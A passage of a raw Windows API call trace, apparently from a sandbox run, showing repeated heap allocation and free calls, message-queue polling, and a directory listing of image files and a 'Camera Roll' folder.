lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0208.550] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0208.550] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0208.550] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0208.550] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0208.550] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0208.550] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0208.550] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0208.550] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.550] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0208.550] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0208.550] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.550] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0208.550] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9d8 [0208.550] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0208.550] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0208.550] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0208.550] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0208.550] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0208.550] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0208.550] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9d8 | out: hHeap=0x2af0000) returned 1 [0208.550] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0208.550] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0208.550] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.551] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0208.551] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0208.551] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0208.551] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0208.551] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0208.551] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0208.551] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2a73610 [0208.551] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72208 [0208.551] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69c10 | out: hHeap=0x2af0000) returned 1 [0208.551] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0208.552] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0208.552] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0208.552] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa08 | out: hHeap=0x2af0000) returned 1 [0208.552] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0208.552] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0208.552] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0208.552] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0208.552] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.552] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0208.552] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0208.552] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.552] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0208.552] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0208.552] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0208.552] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f00 [0208.552] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0208.552] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0208.552] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0208.552] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa08 [0208.552] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0208.552] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa08 | out: hHeap=0x2af0000) returned 1 [0208.552] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0208.552] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0208.552] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0208.552] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f00 | out: hHeap=0x2af0000) returned 1 [0208.552] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0208.552] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0208.552] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.553] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0208.553] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0208.553] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0208.553] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71a0 [0208.553] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0208.553] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721e8 [0208.553] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0208.553] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71a0 | out: hHeap=0x2af0000) returned 1 [0208.553] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0208.553] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0208.553] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8e8 | out: hHeap=0x2af0000) returned 1 [0208.553] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73370 | out: hHeap=0x2af0000) returned 1 [0208.553] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0208.553] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0208.553] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.553] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0208.553] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0208.553] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0208.553] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0208.553] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0208.553] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.553] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0208.553] FindNextFileW (in: hFindFile=0x9e1bf8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x981365d0, ftCreationTime.dwHighDateTime=0x1d5d7dd, ftLastAccessTime.dwLowDateTime=0x1a37ec0, ftLastAccessTime.dwHighDateTime=0x1d5d6be, ftLastWriteTime.dwLowDateTime=0x1a37ec0, ftLastWriteTime.dwHighDateTime=0x1d5d6be, nFileSizeHigh=0x0, nFileSizeLow=0x462f, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="619JnEBOuc.bmp", cAlternateFileName="619JNE~1.BMP")) returned 1 [0208.553] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0208.553] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0208.553] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0208.554] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73610 | out: hHeap=0x2af0000) returned 1 [0208.554] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0208.554] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0208.554] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0208.554] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.554] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0208.554] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.554] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0208.554] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8d0 | out: hHeap=0x2af0000) returned 1 [0208.554] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0208.554] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0208.554] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0208.554] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71a0 | out: hHeap=0x2af0000) returned 1 [0208.554] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0208.554] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0208.554] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.554] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0208.554] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0208.554] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0208.554] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0208.554] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0208.554] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0208.554] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0208.554] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.554] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0208.554] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0208.554] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0208.554] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0208.554] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0208.554] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.554] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0208.555] FindNextFileW (in: hFindFile=0x9e1bf8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4110030, ftCreationTime.dwHighDateTime=0x1d5d29b, ftLastAccessTime.dwLowDateTime=0x165d7400, ftLastAccessTime.dwHighDateTime=0x1d5cb16, ftLastWriteTime.dwLowDateTime=0x165d7400, ftLastWriteTime.dwHighDateTime=0x1d5cb16, nFileSizeHigh=0x0, nFileSizeLow=0x7be6, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="6MclNK.gif", cAlternateFileName="")) returned 1 [0208.555] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa870 | out: hHeap=0x2af0000) returned 1 [0208.555] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0208.555] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0208.555] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0208.555] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0208.555] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0208.555] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0208.555] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.555] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0208.555] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.555] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0208.555] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8d0 | out: hHeap=0x2af0000) returned 1 [0208.555] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8e8 | out: hHeap=0x2af0000) returned 1 [0208.555] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.555] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.555] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.555] FindNextFileW (in: hFindFile=0x9e1bf8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x390ac200, ftCreationTime.dwHighDateTime=0x1d5ce8b, ftLastAccessTime.dwLowDateTime=0x6d57b090, ftLastAccessTime.dwHighDateTime=0x1d5c9b3, ftLastWriteTime.dwLowDateTime=0x6d57b090, ftLastWriteTime.dwHighDateTime=0x1d5c9b3, nFileSizeHigh=0x0, nFileSizeLow=0xe0a8, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="8xG9dA2_eGqi0pv0b0.bmp", cAlternateFileName="8XG9DA~1.BMP")) returned 1 [0208.555] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.555] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.555] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.555] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.555] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.555] FindNextFileW (in: hFindFile=0x9e1bf8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51185a30, ftCreationTime.dwHighDateTime=0x1d5cf88, ftLastAccessTime.dwLowDateTime=0x5ad20230, ftLastAccessTime.dwHighDateTime=0x1d5cc20, ftLastWriteTime.dwLowDateTime=0x5ad20230, ftLastWriteTime.dwHighDateTime=0x1d5cc20, nFileSizeHigh=0x0, nFileSizeLow=0xef91, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="aJ_Kkru.png", cAlternateFileName="")) returned 1 [0208.555] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.555] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.556] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.556] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.556] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.556] FindNextFileW (in: hFindFile=0x9e1bf8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x51278b1d, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd45b4543, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x51278b1d, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="Camera Roll", cAlternateFileName="CAMERA~1")) returned 1 [0208.556] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.556] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.556] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.556] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.556] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.556] FindNextFileW (in: hFindFile=0x9e1bf8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef243d20, ftCreationTime.dwHighDateTime=0x1d5d294, ftLastAccessTime.dwLowDateTime=0x490f7b20, ftLastAccessTime.dwHighDateTime=0x1d5ceed, ftLastWriteTime.dwLowDateTime=0x490f7b20, ftLastWriteTime.dwHighDateTime=0x1d5ceed, nFileSizeHigh=0x0, nFileSizeLow=0x12289, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="cwsPQYJwproUEWJ.jpg", cAlternateFileName="CWSPQY~1.JPG")) returned 1 [0208.556] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.556] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.556] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.556] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.556] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.556] FindNextFileW (in: hFindFile=0x9e1bf8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37829d30, ftCreationTime.dwHighDateTime=0x1d5c96e, ftLastAccessTime.dwLowDateTime=0xff4560a0, ftLastAccessTime.dwHighDateTime=0x1d5d332, ftLastWriteTime.dwLowDateTime=0xff4560a0, ftLastWriteTime.dwHighDateTime=0x1d5d332, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="D7Vw ag.jpg", cAlternateFileName="D7VWAG~1.JPG")) returned 1 [0208.556] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.556] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.556] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.556] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.556] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.556] FindNextFileW (in: hFindFile=0x9e1bf8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x44053085, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x44053085, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce2f1526, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0208.556] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.556] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.557] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.557] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.557] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, 